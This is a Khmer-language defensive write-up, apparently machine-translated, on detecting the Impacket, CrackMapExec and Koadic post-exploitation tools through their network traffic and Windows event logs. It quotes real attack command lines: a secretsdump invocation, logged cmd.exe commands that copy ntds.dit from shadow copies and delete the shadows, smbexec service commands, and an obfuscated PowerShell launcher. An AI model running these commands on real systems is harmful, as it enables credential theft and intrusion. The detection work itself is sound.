វិធីស្វែងរកការវាយប្រហារលើហេដ្ឋារចនាសម្ព័ន្ធវីនដូ៖ សិក្សាឧបករណ៍ហេគឃ័រ

ចំនួននៃការវាយប្រហារនៅក្នុងវិស័យសាជីវកម្មកំពុងកើនឡើងជារៀងរាល់ឆ្នាំ៖ ឧទាហរណ៍ ក្នុងឆ្នាំ 2017 ឧប្បត្តិហេតុប្លែកៗចំនួន 13% ត្រូវបានកត់ត្រាទុក ជាងឆ្នាំ 2016 ហើយនៅចុងឆ្នាំ 2018 - ឧប្បត្តិហេតុ 27% ទៀត។ជាងក្នុងរយៈពេលមុន។ រួមទាំងឧបករណ៍ដែលដំណើរការសំខាន់គឺប្រព័ន្ធប្រតិបត្តិការវីនដូ។ ក្នុងឆ្នាំ 2017-2018 APT Dragonfly, APT28, APT Muddy Water បានធ្វើការវាយប្រហារលើអង្គការរដ្ឋាភិបាល និងយោធានៅអឺរ៉ុប អាមេរិកខាងជើង និងអារ៉ាប៊ីសាអូឌីត។ ហើយយើងបានប្រើឧបករណ៍បីសម្រាប់រឿងនេះ - កញ្ចប់, CrackMapExec и កូអាឌីក. កូដប្រភពរបស់ពួកគេគឺបើកចំហ និងមាននៅលើ GitHub ។

វាគួរឱ្យកត់សម្គាល់ថាឧបករណ៍ទាំងនេះមិនត្រូវបានប្រើសម្រាប់ការជ្រៀតចូលដំបូងនោះទេប៉ុន្តែដើម្បីអភិវឌ្ឍការវាយប្រហារនៅក្នុងហេដ្ឋារចនាសម្ព័ន្ធ។ អ្នកវាយប្រហារប្រើវានៅដំណាក់កាលផ្សេងគ្នានៃការវាយប្រហារបន្ទាប់ពីការជ្រៀតចូលនៃបរិវេណ។ នេះដោយវិធីនេះ គឺពិបាកក្នុងការរកឃើញ ហើយជារឿយៗមានតែជំនួយពីបច្ចេកវិទ្យាប៉ុណ្ណោះ។ កំណត់អត្តសញ្ញាណដាននៃការសម្របសម្រួលនៅក្នុងចរាចរណ៍បណ្តាញ ឬឧបករណ៍ដែលអនុញ្ញាត រកឃើញសកម្មភាពសកម្មរបស់អ្នកវាយប្រហារ បន្ទាប់ពីគាត់បានចូលទៅក្នុងហេដ្ឋារចនាសម្ព័ន្ធ. ឧបករណ៍ផ្តល់មុខងារជាច្រើន ចាប់ពីការផ្ទេរឯកសារ រហូតដល់អន្តរកម្មជាមួយបញ្ជីឈ្មោះ និងប្រតិបត្តិពាក្យបញ្ជានៅលើម៉ាស៊ីនពីចម្ងាយ។ យើងបានធ្វើការសិក្សាលើឧបករណ៍ទាំងនេះដើម្បីកំណត់សកម្មភាពបណ្តាញរបស់ពួកគេ។

អ្វីដែលយើងត្រូវធ្វើ៖

• ស្វែងយល់ពីរបៀបដែលឧបករណ៍លួចចូលដំណើរការ. ស្វែងយល់ថាតើអ្នកវាយប្រហារត្រូវការអ្វីខ្លះដើម្បីកេងប្រវ័ញ្ច និងបច្ចេកវិទ្យាអ្វីដែលពួកគេអាចប្រើប្រាស់បាន។
• ស្វែងរកអ្វីដែលមិនត្រូវបានរកឃើញដោយឧបករណ៍សុវត្ថិភាពព័ត៌មាននៅក្នុងដំណាក់កាលដំបូងនៃការវាយប្រហារ. ដំណាក់កាលឈ្លបយកការណ៍អាចត្រូវបានរំលង ទាំងដោយសារអ្នកវាយប្រហារគឺជាអ្នកវាយប្រហារខាងក្នុង ឬដោយសារតែអ្នកវាយប្រហារកំពុងកេងប្រវ័ញ្ចរន្ធនៅក្នុងហេដ្ឋារចនាសម្ព័ន្ធដែលមិនស្គាល់ពីមុន។ វាក្លាយជាអាចធ្វើទៅបានដើម្បីស្តារខ្សែសង្វាក់ទាំងមូលនៃសកម្មភាពរបស់គាត់ដូច្នេះបំណងប្រាថ្នាដើម្បីរកឃើញចលនាបន្ថែមទៀត។
• លុបបំបាត់ភាពវិជ្ជមានមិនពិតចេញពីឧបករណ៍រកឃើញការឈ្លានពាន. យើងមិនត្រូវភ្លេចថានៅពេលដែលសកម្មភាពជាក់លាក់ត្រូវបានរកឃើញនៅលើមូលដ្ឋាននៃការឈ្លបយកការណ៍តែម្នាក់ឯង កំហុសជាញឹកញាប់អាចធ្វើទៅបាន។ ជាធម្មតានៅក្នុងហេដ្ឋារចនាសម្ព័ន្ធមានមធ្យោបាយគ្រប់គ្រាន់ ដែលមិនអាចបែងចែកបានពីវិធីស្របច្បាប់នៅ glance ដំបូង ដើម្បីទទួលបានព័ត៌មានណាមួយ។

តើឧបករណ៍ទាំងនេះផ្តល់ឱ្យអ្នកវាយប្រហារអ្វីខ្លះ? ប្រសិនបើនេះជា Impacket នោះអ្នកវាយប្រហារទទួលបានបណ្ណាល័យដ៏ធំមួយនៃម៉ូឌុលដែលអាចប្រើបាននៅដំណាក់កាលផ្សេងគ្នានៃការវាយប្រហារដែលកើតឡើងបន្ទាប់ពីបំបែកបរិវេណនោះ។ ឧបករណ៍ជាច្រើនប្រើម៉ូឌុល Impacket ខាងក្នុង - ឧទាហរណ៍ Metasploit ។ វាមាន dcomexec និង wmiexec សម្រាប់ប្រតិបត្តិពាក្យបញ្ជាពីចម្ងាយ secretsdump សម្រាប់ការទទួលបានគណនីពីអង្គចងចាំដែលត្រូវបានបន្ថែមពី Impacket ។ ជាលទ្ធផល ការរកឃើញត្រឹមត្រូវនៃសកម្មភាពនៃបណ្ណាល័យបែបនេះនឹងធានាបាននូវការរកឃើញនៃនិស្សន្ទវត្ថុ។

វាមិនមែនជារឿងចៃដន្យទេដែលអ្នកបង្កើតបានសរសេរថា "គាំទ្រដោយ Impacket" អំពី CrackMapExec (ឬសាមញ្ញ CME) ។ លើសពីនេះទៀត CME មានមុខងារដែលត្រៀមរួចជាស្រេចសម្រាប់សេណារីយ៉ូដ៏ពេញនិយម៖ Mimikatz សម្រាប់ការទទួលបានពាក្យសម្ងាត់ ឬសញ្ញាសញ្ញារបស់ពួកគេ ការអនុវត្ត Meterpreter ឬភ្នាក់ងារ Empire សម្រាប់ការប្រតិបត្តិពីចម្ងាយ និង Bloodhound នៅលើយន្តហោះ។

ឧបករណ៍ទីបីដែលយើងជ្រើសរើសគឺ Koadic ។ ថ្មីៗនេះ វាត្រូវបានបង្ហាញនៅក្នុងសន្និសិទ Hacker អន្តរជាតិ DEFCON 25 ក្នុងឆ្នាំ 2017 ហើយត្រូវបានសម្គាល់ដោយវិធីសាស្រ្តមិនស្តង់ដារ៖ វាដំណើរការតាមរយៈ HTTP, Java Script និង Microsoft Visual Basic Script (VBS) ។ វិធីសាស្រ្តនេះត្រូវបានគេហៅថាការរស់នៅក្រៅដី៖ ឧបករណ៍ប្រើប្រាស់សំណុំនៃភាពអាស្រ័យ និងបណ្ណាល័យដែលបានបង្កើតឡើងនៅក្នុងវីនដូ។ អ្នកបង្កើតហៅវាថា COM Command & Control ឬ C3 ។

IMPACKET

មុខងាររបស់ Impacket គឺធំទូលាយណាស់ ចាប់ពីការឈ្លបយកការណ៍នៅខាងក្នុង AD និងការប្រមូលទិន្នន័យពីម៉ាស៊ីនមេ MS SQL ខាងក្នុង រហូតដល់បច្ចេកទេសដើម្បីទទួលបានព័ត៌មានបញ្ជាក់អត្តសញ្ញាណ៖ នេះគឺជាការវាយប្រហារបញ្ជូនត SMB និងការទទួលបានឯកសារ ntds.dit ដែលមានលេខសម្ងាត់អ្នកប្រើប្រាស់ពីឧបករណ៍បញ្ជាដែន។ Impacket ក៏ប្រតិបត្តិពាក្យបញ្ជាពីចម្ងាយដោយប្រើវិធីបួនផ្សេងគ្នាដែរ៖ WMI, Windows Scheduler Management Service, DCOM, និង SMB ហើយទាមទារព័ត៌មានបញ្ជាក់អត្តសញ្ញាណដើម្បីធ្វើដូច្នេះបាន។

អាថ៌កំបាំង

តោះមើលរឿងសម្ងាត់។ នេះគឺជាម៉ូឌុលដែលអាចកំណត់គោលដៅទាំងម៉ាស៊ីនអ្នកប្រើប្រាស់ និងឧបករណ៍បញ្ជាដែន។ វាអាចត្រូវបានប្រើដើម្បីទទួលបានច្បាប់ចម្លងនៃតំបន់អង្គចងចាំ LSA, SAM, SECURITY, NTDS.dit ដូច្នេះវាអាចត្រូវបានគេមើលឃើញនៅដំណាក់កាលផ្សេងគ្នានៃការវាយប្រហារ។ ជំហានដំបូងក្នុងប្រតិបត្តិការរបស់ម៉ូឌុលគឺការផ្ទៀងផ្ទាត់តាមរយៈ SMB ដែលទាមទារទាំងពាក្យសម្ងាត់របស់អ្នកប្រើ ឬសញ្ញារបស់វាដើម្បីអនុវត្តការវាយប្រហារ Pass the Hash ដោយស្វ័យប្រវត្តិ។ បន្ទាប់មកមានសំណើដើម្បីបើកការចូលប្រើកម្មវិធីគ្រប់គ្រងសេវាកម្ម (SCM) និងទទួលបានសិទ្ធិចូលដំណើរការបញ្ជីឈ្មោះតាមរយៈពិធីការ winreg ដោយប្រើដែលអ្នកវាយប្រហារអាចស្វែងរកទិន្នន័យនៃសាខាដែលចាប់អារម្មណ៍ និងទទួលបានលទ្ធផលតាមរយៈ SMB ។

នៅក្នុងរូបភព។ 1 យើងឃើញថាតើនៅពេលប្រើពិធីការ winreg ការចូលប្រើត្រូវបានទទួលដោយប្រើសោចុះបញ្ជីជាមួយ LSA យ៉ាងដូចម្តេច។ ដើម្បីធ្វើដូចនេះសូមប្រើពាក្យបញ្ជា DCERPC ជាមួយ opcode 15 - OpenKey ។

អង្ករ។ 1. ការបើកសោចុះបញ្ជីដោយប្រើពិធីការ winreg

បន្ទាប់មក នៅពេលដែលការចូលប្រើសោត្រូវបានទទួល តម្លៃត្រូវបានរក្សាទុកដោយប្រើពាក្យបញ្ជា SaveKey ជាមួយ opcode 20. Impacket ធ្វើដូចនេះតាមវិធីជាក់លាក់មួយ។ វា​រក្សាទុក​តម្លៃ​ទៅ​ឯកសារ​ដែល​មាន​ឈ្មោះ​ជា​អក្សរ​ចៃដន្យ​ចំនួន 8 បន្ថែម​ដោយ .tmp ។ លើសពីនេះ ការបង្ហោះឯកសារនេះបន្ថែមទៀតកើតឡើងតាមរយៈ SMB ពីថត System32 (រូបភាពទី 2)។

អង្ករ។ 2. គ្រោងការណ៍សម្រាប់ការទទួលបានកូនសោចុះបញ្ជីពីម៉ាស៊ីនពីចម្ងាយ

វាបង្ហាញថាសកម្មភាពបែបនេះនៅលើបណ្តាញអាចត្រូវបានរកឃើញដោយសំណួរទៅកាន់សាខាបញ្ជីឈ្មោះមួយចំនួនដោយប្រើពិធីការ winreg ឈ្មោះជាក់លាក់ ពាក្យបញ្ជា និងលំដាប់របស់វា។

ម៉ូឌុលនេះក៏ទុកដាននៅក្នុងកំណត់ហេតុព្រឹត្តិការណ៍ Windows ដែលធ្វើឱ្យវាងាយស្រួលក្នុងការរកឃើញ។ ឧទាហរណ៍ជាលទ្ធផលនៃការប្រតិបត្តិពាក្យបញ្ជា

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

នៅក្នុងកំណត់ហេតុ Windows Server 2016 យើងនឹងឃើញលំដាប់សំខាន់ៗនៃព្រឹត្តិការណ៍ដូចខាងក្រោម៖

1. 4624 - ចូលពីចម្ងាយ។
2. 5145 - ពិនិត្យមើលសិទ្ធិចូលប្រើសេវាកម្មពីចម្ងាយ winreg ។
3. 5145 - ពិនិត្យមើលសិទ្ធិចូលប្រើឯកសារនៅក្នុងថត System32 ។ ឯកសារមានឈ្មោះចៃដន្យដែលបានរៀបរាប់ខាងលើ។
4. 4688 - បង្កើតដំណើរការ cmd.exe ដែលបើកដំណើរការ vssadmin៖

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - បង្កើតដំណើរការជាមួយពាក្យបញ្ជា៖

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - បង្កើតដំណើរការជាមួយពាក្យបញ្ជា៖

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - បង្កើតដំណើរការជាមួយពាក្យបញ្ជា៖

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

ដូចជាឧបករណ៍ក្រោយការកេងប្រវ័ញ្ចជាច្រើន Impacket មានម៉ូឌុលសម្រាប់ប្រតិបត្តិពាក្យបញ្ជាពីចម្ងាយ។ យើងនឹងផ្តោតលើ smbexec ដែលផ្តល់នូវសែលពាក្យបញ្ជាអន្តរកម្មនៅលើម៉ាស៊ីនពីចម្ងាយ។ ម៉ូឌុលនេះក៏ទាមទារការផ្ទៀងផ្ទាត់តាមរយៈ SMB ផងដែរ ទាំងដោយប្រើលេខសម្ងាត់ ឬលេខកូដសម្ងាត់។ នៅក្នុងរូបភព។ នៅក្នុងរូបភាពទី 3 យើងឃើញឧទាហរណ៍អំពីរបៀបដែលឧបករណ៍បែបនេះដំណើរការ ក្នុងករណីនេះវាគឺជាកុងសូលអ្នកគ្រប់គ្រងមូលដ្ឋាន។

អង្ករ។ 3. កុងសូល smbexec អន្តរកម្ម

ជំហានដំបូងនៃ smbexec បន្ទាប់ពីការផ្ទៀងផ្ទាត់គឺត្រូវបើក ​​SCM ដោយប្រើពាក្យបញ្ជា OpenSCManagerW (15) ។ សំណួរគឺគួរឱ្យកត់សម្គាល់: វាលឈ្មោះម៉ាស៊ីនគឺអត់ចេះសោះ។

អង្ករ។ 4. ស្នើសុំបើកកម្មវិធីគ្រប់គ្រងសេវាកម្ម

បន្ទាប់មកសេវាកម្មត្រូវបានបង្កើតដោយប្រើពាក្យបញ្ជា CreateServiceW (12) ។ ក្នុងករណី smbexec យើងអាចមើលឃើញតក្កវិជ្ជាសំណង់ពាក្យបញ្ជាដូចគ្នារាល់ពេល។ នៅក្នុងរូបភព។ 5 ពណ៌បៃតងបង្ហាញពីប៉ារ៉ាម៉ែត្រពាក្យបញ្ជាដែលមិនអាចផ្លាស់ប្តូរបាន ពណ៌លឿងបង្ហាញពីអ្វីដែលអ្នកវាយប្រហារអាចផ្លាស់ប្តូរ។ វាងាយស្រួលមើលឃើញថាឈ្មោះឯកសារដែលអាចប្រតិបត្តិបាន ថតឯកសាររបស់វា និងឯកសារលទ្ធផលអាចត្រូវបានផ្លាស់ប្តូរ ប៉ុន្តែនៅសល់គឺពិបាកជាងក្នុងការផ្លាស់ប្តូរដោយមិនរំខានដល់តក្កវិជ្ជានៃម៉ូឌុល Impacket ។

អង្ករ។ 5. ស្នើសុំបង្កើតសេវាកម្មដោយប្រើកម្មវិធីគ្រប់គ្រងសេវាកម្ម

Smbexec ក៏ទុកដានជាក់ស្តែងនៅក្នុងកំណត់ហេតុព្រឹត្តិការណ៍វីនដូផងដែរ។ នៅក្នុងកំណត់ហេតុ Windows Server 2016 សម្រាប់សែលពាក្យបញ្ជាអន្តរកម្មជាមួយពាក្យបញ្ជា ipconfig យើងនឹងឃើញលំដាប់សំខាន់ៗនៃព្រឹត្តិការណ៍ដូចខាងក្រោម៖

1. 4697 — ការដំឡើងសេវានៅលើម៉ាស៊ីនជនរងគ្រោះ៖

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ការបង្កើតដំណើរការ cmd.exe ជាមួយនឹងអាគុយម៉ង់ពីចំណុច 1 ។
3. 5145 - ពិនិត្យមើលសិទ្ធិចូលដំណើរការទៅកាន់ឯកសារ __output នៅក្នុងថត C$ ។
4. 4697 - ការដំឡើងសេវានៅលើម៉ាស៊ីនរបស់ជនរងគ្រោះ។

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ការបង្កើតដំណើរការ cmd.exe ជាមួយនឹងអាគុយម៉ង់ពីចំណុច 4 ។
6. 5145 - ពិនិត្យមើលសិទ្ធិចូលដំណើរការទៅកាន់ឯកសារ __output នៅក្នុងថត C$ ។

Impacket គឺជាមូលដ្ឋានសម្រាប់ការអភិវឌ្ឍន៍ឧបករណ៍វាយប្រហារ។ វាគាំទ្រពិធីការស្ទើរតែទាំងអស់នៅក្នុងហេដ្ឋារចនាសម្ព័ន្ធវីនដូ ហើយក្នុងពេលតែមួយមានលក្ខណៈពិសេសផ្ទាល់ខ្លួនរបស់វា។ នេះគឺជាសំណើជាក់លាក់របស់ winreg និងការប្រើប្រាស់ SCM API ជាមួយនឹងការបង្កើតពាក្យបញ្ជាលក្ខណៈ និងទម្រង់ឈ្មោះឯកសារ និង SMB share SYSTEM32។

CRACKMAPEXEC

ឧបករណ៍ CME ត្រូវបានរចនាឡើងជាចម្បងដើម្បីធ្វើស្វ័យប្រវត្តិកម្មសកម្មភាពទម្លាប់ទាំងនោះដែលអ្នកវាយប្រហារត្រូវធ្វើដើម្បីឈានទៅមុខក្នុងបណ្តាញ។ វាអនុញ្ញាតឱ្យអ្នកធ្វើការដោយភ្ជាប់ជាមួយភ្នាក់ងារ Empire និង Meterpreter ដ៏ល្បីល្បាញ។ ដើម្បីប្រតិបត្តិពាក្យបញ្ជាដោយសម្ងាត់ CME អាចបំភ័ន្តពួកវាបាន។ ដោយប្រើ Bloodhound (ឧបករណ៍ឈ្លបយកការណ៍ដាច់ដោយឡែក) អ្នកវាយប្រហារអាចធ្វើការស្វែងរកដោយស្វ័យប្រវត្តិសម្រាប់វគ្គគ្រប់គ្រងដែនសកម្ម។

ការបង្ហូរឈាម

Bloodhound ជាឧបករណ៍ឯករាជ្យ អនុញ្ញាតឱ្យមានការឈ្លបយកការណ៍កម្រិតខ្ពស់នៅក្នុងបណ្តាញ។ វាប្រមូលទិន្នន័យអំពីអ្នកប្រើប្រាស់ ម៉ាស៊ីន ក្រុម វគ្គ និងត្រូវបានផ្គត់ផ្គង់ជាស្គ្រីប PowerShell ឬឯកសារគោលពីរ។ ពិធីការដែលមានមូលដ្ឋានលើ LDAP ឬ SMB ត្រូវបានប្រើដើម្បីប្រមូលព័ត៌មាន។ ម៉ូឌុលរួមបញ្ចូល CME អនុញ្ញាតឱ្យ Bloodhound ត្រូវបានទាញយកទៅកាន់ម៉ាស៊ីនរបស់ជនរងគ្រោះ ដំណើរការ និងទទួលទិន្នន័យដែលបានប្រមូលបន្ទាប់ពីការប្រតិបត្តិ ដោយហេតុនេះសកម្មភាពដោយស្វ័យប្រវត្តិនៅក្នុងប្រព័ន្ធ និងធ្វើឱ្យពួកវាមិនសូវកត់សម្គាល់។ សែលក្រាហ្វិក Bloodhound បង្ហាញទិន្នន័យដែលប្រមូលបានក្នុងទម្រង់ជាក្រាហ្វ ដែលអនុញ្ញាតឱ្យអ្នកស្វែងរកផ្លូវខ្លីបំផុតពីម៉ាស៊ីនរបស់អ្នកវាយប្រហារទៅកាន់អ្នកគ្រប់គ្រងដែន។

អង្ករ។ 6. ចំណុចប្រទាក់ Bloodhound

ដើម្បីដំណើរការលើម៉ាស៊ីនរបស់ជនរងគ្រោះ ម៉ូឌុលបង្កើតភារកិច្ចដោយប្រើ ATSVC និង SMB ។ ATSVC គឺជាចំណុចប្រទាក់សម្រាប់ធ្វើការជាមួយ Windows Task Scheduler ។ CME ប្រើមុខងារ NetrJobAdd(1) របស់ខ្លួនដើម្បីបង្កើតកិច្ចការនៅលើបណ្តាញ។ ឧទាហរណ៍នៃអ្វីដែលម៉ូឌុល CME ផ្ញើត្រូវបានបង្ហាញនៅក្នុងរូបភព។ 7: នេះគឺជាការហៅពាក្យបញ្ជា cmd.exe និងកូដដែលច្រឡំនៅក្នុងទម្រង់នៃអាគុយម៉ង់ក្នុងទម្រង់ XML ។

រូប ៧. បង្កើតកិច្ចការតាមរយៈ CME

បន្ទាប់ពីកិច្ចការត្រូវបានដាក់ស្នើសម្រាប់ការប្រហារជីវិត ម៉ាស៊ីនរបស់ជនរងគ្រោះចាប់ផ្តើម Bloodhound ដោយខ្លួនឯង ហើយនេះអាចត្រូវបានគេមើលឃើញនៅក្នុងចរាចរណ៍។ ម៉ូឌុលត្រូវបានកំណត់លក្ខណៈដោយសំណួរ LDAP ដើម្បីទទួលបានក្រុមស្តង់ដារ បញ្ជីម៉ាស៊ីន និងអ្នកប្រើប្រាស់ទាំងអស់នៅក្នុងដែន និងទទួលបានព័ត៌មានអំពីវគ្គអ្នកប្រើប្រាស់សកម្មតាមរយៈសំណើ SRVSVC NetSessEnum ។

អង្ករ។ 8. ការទទួលបានបញ្ជីនៃវគ្គសកម្មតាមរយៈ SMB

លើសពីនេះទៀត ការបើកដំណើរការ Bloodhound នៅលើម៉ាស៊ីនជនរងគ្រោះជាមួយនឹងការបើកសវនកម្មត្រូវបានអមដោយព្រឹត្តិការណ៍ដែលមានលេខសម្គាល់ 4688 (ការបង្កើតដំណើរការ) និងឈ្មោះដំណើរការ។ «C:WindowsSystem32cmd.exe». អ្វីដែលគួរឱ្យកត់សម្គាល់អំពីវាគឺអាគុយម៉ង់បន្ទាត់ពាក្យបញ្ជា:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

ម៉ូឌុល enum_avproducts គឺគួរឱ្យចាប់អារម្មណ៍ខ្លាំងណាស់ពីចំណុចនៃទិដ្ឋភាពនៃមុខងារនិងការអនុវត្ត។ WMI អនុញ្ញាតឱ្យអ្នកប្រើភាសាសំណួរ WQL ដើម្បីទាញយកទិន្នន័យពីវត្ថុ Windows ផ្សេងៗ ដែលជាអ្វីដែលសំខាន់ដែលម៉ូឌុល CME នេះប្រើ។ វាបង្កើតសំណួរទៅកាន់ថ្នាក់ AntiSpywareProduct និង AntiМirusProduct អំពីឧបករណ៍ការពារដែលបានដំឡើងនៅលើម៉ាស៊ីនរបស់ជនរងគ្រោះ។ ដើម្បីទទួលបានទិន្នន័យចាំបាច់ ម៉ូឌុលភ្ជាប់ទៅកន្លែងឈ្មោះ rootSecurityCenter2 បន្ទាប់មកបង្កើតសំណួរ WQL និងទទួលបានការឆ្លើយតប។ នៅក្នុងរូបភព។ រូបភាពទី 9 បង្ហាញពីខ្លឹមសារនៃសំណើ និងការឆ្លើយតបបែបនេះ។ នៅក្នុងឧទាហរណ៍របស់យើង Windows Defender ត្រូវបានរកឃើញ។

អង្ករ។ 9. សកម្មភាពបណ្តាញនៃម៉ូឌុល enum_avproducts

ជាញឹកញាប់ ការធ្វើសវនកម្ម WMI (Trace WMI-Activity) ដែលនៅក្នុងព្រឹត្តិការណ៍ដែលអ្នកស្វែងរកព័ត៌មានមានប្រយោជន៍អំពីសំណួរ WQL អាចត្រូវបានបិទ។ ប៉ុន្តែប្រសិនបើវាត្រូវបានបើក នោះប្រសិនបើស្គ្រីប enum_avproducts ត្រូវបានដំណើរការ ព្រឹត្តិការណ៍ដែលមានលេខសម្គាល់ 11 នឹងត្រូវបានរក្សាទុក។ វានឹងមានឈ្មោះអ្នកប្រើប្រាស់ដែលបានផ្ញើសំណើ និងឈ្មោះនៅក្នុង namespace rootSecurityCenter2។

ម៉ូឌុល CME នីមួយៗមានវត្ថុបុរាណរៀងៗខ្លួន ថាតើវាជាសំណួរ WQL ជាក់លាក់ ឬការបង្កើតប្រភេទការងារជាក់លាក់មួយនៅក្នុងកម្មវិធីកំណត់ពេលភារកិច្ចដែលមានភាពច្របូកច្របល់ និងសកម្មភាពជាក់លាក់ Bloodhound នៅក្នុង LDAP និង SMB ។

KOADIC

លក្ខណៈពិសេសប្លែករបស់ Koadic គឺការប្រើប្រាស់កម្មវិធីបកប្រែ JavaScript និង VBScript ដែលបានបង្កើតឡើងនៅក្នុង Windows ។ ក្នុងន័យនេះ វាធ្វើតាមទំនោរនៃការរស់នៅក្រៅដី - នោះគឺវាមិនមានការពឹងផ្អែកពីខាងក្រៅ និងប្រើឧបករណ៍វីនដូស្តង់ដារ។ នេះគឺជាឧបករណ៍សម្រាប់ Command & Control ពេញលេញ (CnC) ចាប់តាំងពីបន្ទាប់ពីឆ្លងមេរោគ "implant" ត្រូវបានដំឡើងនៅលើម៉ាស៊ីន ដែលអនុញ្ញាតឱ្យវាគ្រប់គ្រង។ ម៉ាស៊ីនបែបនេះនៅក្នុងវាក្យស័ព្ទ Koadic ត្រូវបានគេហៅថា "ខ្មោចឆៅ" ។ ប្រសិនបើមានសិទ្ធិមិនគ្រប់គ្រាន់សម្រាប់ប្រតិបត្តិការពេញលេញនៅខាងភាគីជនរងគ្រោះ Koadic មានលទ្ធភាពលើកពួកគេដោយប្រើបច្ចេកទេសឆ្លងកាត់ការគ្រប់គ្រងគណនីអ្នកប្រើប្រាស់ (UAC bypass) ។

អង្ករ។ 10. Koadic Shell

ជនរងគ្រោះត្រូវតែចាប់ផ្តើមទំនាក់ទំនងជាមួយម៉ាស៊ីនមេ Command & Control ។ ដើម្បីធ្វើដូចនេះនាងត្រូវទាក់ទង URI ដែលបានរៀបចំពីមុនហើយទទួលបានតួ Koadic សំខាន់ដោយប្រើឧបករណ៍សំដែងមួយ។ នៅក្នុងរូបភព។ រូបភាពទី 11 បង្ហាញឧទាហរណ៍សម្រាប់ mshta stager ។

អង្ករ។ 11. ការចាប់ផ្តើមសម័យជាមួយម៉ាស៊ីនមេ CnC

ដោយផ្អែកលើអថេរឆ្លើយតប WS វាច្បាស់ថាការប្រតិបត្តិកើតឡើងតាមរយៈ WScript.Shell ហើយអថេរ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE មានព័ត៌មានសំខាន់ៗអំពីប៉ារ៉ាម៉ែត្រនៃវគ្គបច្ចុប្បន្ន។ នេះគឺជាគូឆ្លើយតបសំណើដំបូងនៅក្នុងការតភ្ជាប់ HTTP ជាមួយម៉ាស៊ីនមេ CnC ។ សំណើជាបន្តបន្ទាប់គឺទាក់ទងដោយផ្ទាល់ទៅនឹងមុខងារនៃម៉ូឌុលដែលគេហៅថា (ការផ្សាំ)។ ម៉ូឌុល Koadic ទាំងអស់ដំណើរការតែជាមួយវគ្គសកម្មជាមួយ CnC ប៉ុណ្ណោះ។

Mimikatz

ដូច CME ធ្វើការជាមួយ Bloodhound ដែរ Koadic ធ្វើការជាមួយ Mimikatz ជាកម្មវិធីដាច់ដោយឡែក និងមានវិធីជាច្រើនដើម្បីបើកដំណើរការវា។ ខាងក្រោម​នេះ​គឺ​ជា​គូ​ឆ្លើយតប​សំណើ​សម្រាប់​ការ​ទាញ​យក Mimikatz implant ។

អង្ករ។ 12. ផ្ទេរ Mimikatz ទៅ Koadic

អ្នកអាចមើលពីរបៀបដែលទម្រង់ URI ក្នុងសំណើបានផ្លាស់ប្តូរ។ ឥឡូវនេះវាមានតម្លៃសម្រាប់អថេរ csrf ដែលទទួលខុសត្រូវចំពោះម៉ូឌុលដែលបានជ្រើសរើស។ កុំយកចិត្តទុកដាក់ចំពោះឈ្មោះរបស់នាង; យើងទាំងអស់គ្នាដឹងថា CSRF ជាធម្មតាត្រូវបានយល់ខុសគ្នា។ ការឆ្លើយតបគឺជាតួសំខាន់ដូចគ្នារបស់ Koadic ដែលកូដដែលទាក់ទងនឹង Mimikatz ត្រូវបានបន្ថែម។ វាមានទំហំធំណាស់ ដូច្នេះសូមក្រឡេកមើលចំណុចសំខាន់ៗ។ នៅទីនេះយើងមានបណ្ណាល័យ Mimikatz ដែលត្រូវបានអ៊ិនកូដក្នុង base64 ដែលជាថ្នាក់ .NET ស៊េរីដែលនឹងចាក់វា និងអាគុយម៉ង់ដើម្បីបើកដំណើរការ Mimikatz ។ លទ្ធផលប្រតិបត្តិត្រូវបានបញ្ជូនតាមបណ្តាញក្នុងអត្ថបទច្បាស់លាស់។

អង្ករ។ 13. លទ្ធផលនៃការដំណើរការ Mimikatz នៅលើម៉ាស៊ីនពីចម្ងាយ

Exec_cmd

Koadic ក៏មានម៉ូឌុលដែលអាចប្រតិបត្តិពាក្យបញ្ជាពីចម្ងាយផងដែរ។ នៅទីនេះយើងនឹងឃើញវិធីសាស្ត្របង្កើត URI ដូចគ្នា និងអថេរ sid និង csrf ដែលធ្លាប់ស្គាល់។ ក្នុងករណីនៃម៉ូឌុល exec_cmd កូដត្រូវបានបន្ថែមទៅតួដែលមានសមត្ថភាពប្រតិបត្តិពាក្យបញ្ជាសែល។ ខាងក្រោមត្រូវបានបង្ហាញកូដបែបនេះដែលមាននៅក្នុងការឆ្លើយតប HTTP របស់ម៉ាស៊ីនមេ CnC ។

អង្ករ។ 14. លេខកូដ Implant exec_cmd

